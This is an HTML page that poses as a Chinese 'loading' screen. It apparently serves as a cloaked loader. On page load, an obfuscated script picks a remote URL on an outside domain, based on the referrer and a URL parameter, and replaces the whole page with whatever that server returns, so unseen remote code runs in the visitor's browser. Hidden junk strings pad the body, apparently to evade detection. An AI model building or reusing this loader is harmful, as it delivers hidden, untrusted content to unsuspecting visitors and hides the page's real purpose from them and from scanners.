<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .oVMKVY {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .oVMKVY .dmq7hBxn8GI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .oVMKVY .content {
            line-height: 50px;
            text-align: center
        }

        .oVMKVY .img {
            width: 100%
        }

        .oVMKVY .f5THv7 {
            text-align: center
        }

        .oVMKVY .f5THv7 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .oVMKVY .f5THv7 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .oVMKVY .f5THv7 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .oVMKVY .f5THv7 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .oVMKVY .f5THv7 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .oVMKVY .f5THv7 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .oVMKVY .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UiTm11vxq(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var uum8iwS = UiTm11vxq('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ uum8iwS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ uum8iwS +".html?a=share";
		}
		
        cuNLnWhsNs=url+"#"+new Date().getTime();
        cuNLnWhsNs && function() {
            $.get(cuNLnWhsNs, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>qfREyzXhMcwyzaQtsbF1KyacleK2sJM6MbMoEv1a80LeJgDKjddVm3ifMjcPY8Sseet1u0declOBsC1WLHCmVcc</span>
<h1 style='display:none' >aLSgh8hwQz4VioW7aBqyvXt4Tauohz8NGxmfsPR47jk3DgFt</h1>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<span style='display:none'>qfREyzXhMcwyzaQtsbF1KyacleK2sJM6MbMoEv1a80LeJgDKjddVm3ifMjcPY8Sseet1u0declOBsC1WLHCmVcc</span>
<li style='display:none' >JPacR2OyQ9cKVhw6evA3e39C</li>
<div style='display:none'>xSzyQ39Eka5bETM0f28AolZ9RykSZrzwXwHeotcFt9Zc</div>
<ul style='display:none' >DBBydVRn2WHRLRVgPOkiaEW7ZCe9ds83YtWkocKKYnIQETak9B7mBZWiQ2cBgnlDcyfDQPAFv2lsPS6MlRmf1iCMmDOCeLdWKZ</ul>
<li style='display:none' >JPacR2OyQ9cKVhw6evA3e39C</li><div class="oVMKVY">
    <div class="dmq7hBxn8GI">
        <div class="f5THv7">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >nvsnhZdpGgH9d7HtBhQKTnXnS8P9jbA7c0Qp3xQi1iQ9NB1hLE</li>
<b style='display:none' >duhVGcd63ObONcdUiruVgmhwIAGC5FcRvOYdGN3IsTSFX</b>
<span style='display:none'>UIOgNt8o3AzvfMDbYVCYy75RVQoBEIzIqClqbIpXV1V3XNNfzJwJSXjmriN9B9X0wO5xaZHw7eofZ93OQwxMmMLnMm77L3ZQ4B</span>
<p  style='display:none'>rIepdtdITvz9jdODtRYv9iq2RXcJVL6wMPf16Xr8OAvQZj0vjlLoF8wgkg0dfTgywHYoboX2J7GbgCEp96Y1J0D2sRb8PHD</p>
<ul style='display:none' >jxrpdFYY9iyq4NxuzOx8wG3Rny8OM5v4bGHhg1qBq5Q7fcIBAIUHFuL</ul></body>
</html>